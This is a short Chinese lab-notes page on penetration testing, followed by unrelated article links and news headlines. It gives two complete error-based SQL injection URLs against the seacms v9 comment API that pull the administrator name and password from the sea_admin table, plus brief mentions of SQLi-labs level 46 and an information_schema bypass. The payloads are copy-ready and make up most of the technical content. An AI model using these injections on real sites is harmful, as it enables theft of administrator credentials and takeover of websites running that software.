当前位置: 首页 > news >正文

渗透测试实验

news 来源:原创 2025/5/17 21:34:46

1、seacmsv9注入管理员密码

获取管理员账号(name)

http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`

 

2、获取管理员密码

 http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

 

2、SQLilabs第46关 

 

使用?sort=1/2其排序不同,可以得知使用了orderby语句,存在漏洞。使用python脚本获取数据。

3、information_schema的绕过

使用join的子查询

相关文章:

  • 使用DeepSeek/ChatGPT等AI工具辅助编写wireshark过滤器
  • 实体机器人在gazebo中的映射
  • MagicArticulate: 超48K海量数据革新3D动画,自回归Transformer驱动关节智能生成!
  • Java 大视界 -- 基于 Java 的大数据机器学习模型压缩与部署优化(99)
  • Flink 中的滚动策略(Rolling Policy)
  • 通过命令启动steam的游戏
  • 软件项目开发中,产品经理借助 AI 工具将产品设计转化为需求的方法
  • echart版本^5.4.2,brush区域选择(框选),实现自定义按钮调取框选工具
  • 【第三天】零基础学习量化基础代码分析-持续更新
  • 基于Python和Django框架的食堂外卖系统设计与开发~源码
  • 论文阅读笔记:Deep Face Recognition: A Survey
  • 面试八股文--并发编程篇
  • skytower靶机详细教学
  • 第9章:LangChain结构化输出-示例5(基于大模型如何精确匹配POJO的字段)
  • Spring Security功能概述和相关介绍
  • IP------PPP协议
  • 利用 Vue 3 + Vite + Element UI Plus 结合 Service Worker 实现版本管理
  • pandas读取数据
  • 高并发微服务日志管理:ELK、Loki、Fluentd 终极对决与实战指南
  • 矩阵的 正定(Positive Definite)与负定(Negative Definite):从Fisher信息矩阵看“曲率”的秘密
  • 全国多家健身房女性月卡延长,补足因月经期耽误的健身时间
  • 国家统计局:2024年城镇单位就业人员工资平稳增长
  • 美官方将使用华为芯片视作违反美出口管制行为,外交部回应
  • 4台肺癌手术,2名“90后”患者,这届年轻人的肺怎么了?
  • 杭州“放大招”支持足球发展:足球人才可评“高层次人才”
  • 四部门:到2025年底,全国行政村5G通达率超过90%